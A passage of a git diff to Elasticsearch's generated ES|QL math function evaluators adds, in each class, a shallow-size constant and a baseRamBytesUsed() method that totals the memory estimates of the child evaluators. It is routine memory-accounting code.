diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java
index 0e0ac4b93d11f..139ec3ce20c00 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AsinEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AsinEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java
index 09d0b1a7fd35c..7d9d8bca62266 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class Atan2Evaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Atan2Evaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator y;
@@ -57,6 +60,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += y.baseRamBytesUsed();
+    baseRamBytesUsed += x.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock yBlock, DoubleBlock xBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java
index 0cd8adda340e5..f238c2d774f14 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AtanEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AtanEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java
index e43daae68ed66..d28e409a55f83 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastIntToDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, IntBlock vBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java
index f1d850fa935f5..ddb35ef13b17e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastIntToLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, IntBlock vBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java
index 69e2a69a59027..d382321b5569c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastIntToUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToUnsignedLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, IntBlock vBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java
index e82ed233839f1..4e9af32c63b95 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastLongToDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastLongToDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock vBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java
index ba78e37cf5ee3..f54e1265181e7 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastLongToUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastLongToUnsignedLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock vBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java
index 458a74ad704cc..d83c7e5918677 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CastUnsignedLongToDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastUnsignedLongToDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock vBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java
index 923ab07f61ce0..bc3af8e043f3d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CbrtDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java
index 63f41e08a65f1..4cf7e99a7656a 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.IntBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CbrtIntEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtIntEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, IntBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java
index a94ea6dab1446..f17eb8236ccf6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CbrtLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java
index a959e01f44a1f..e4d82882afa12 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CbrtUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtUnsignedLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java
index 32233fbc24d04..7887f020ea0b5 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CeilDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CeilDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java
index 4685359679c2f..1473587b2dd2a 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CopySignDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator magnitude;
@@ -57,6 +60,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += magnitude.baseRamBytesUsed();
+    baseRamBytesUsed += sign.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock magnitudeBlock, DoubleBlock signBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java
index 6a55a742d631c..b875b9d5c02f6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CopySignFloatEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignFloatEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator magnitude;
@@ -59,6 +62,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += magnitude.baseRamBytesUsed();
+    baseRamBytesUsed += sign.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public FloatBlock eval(int positionCount, FloatBlock magnitudeBlock, DoubleBlock signBlock) {
     try(FloatBlock.Builder result = driverContext.blockFactory().newFloatBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java
index e9db4a0f12506..023625eb7dc94 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CopySignIntegerEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignIntegerEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator magnitude;
@@ -59,6 +62,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += magnitude.baseRamBytesUsed();
+    baseRamBytesUsed += sign.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock magnitudeBlock, DoubleBlock signBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java
index 4afbcedd3842a..ea25c47725d5e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java
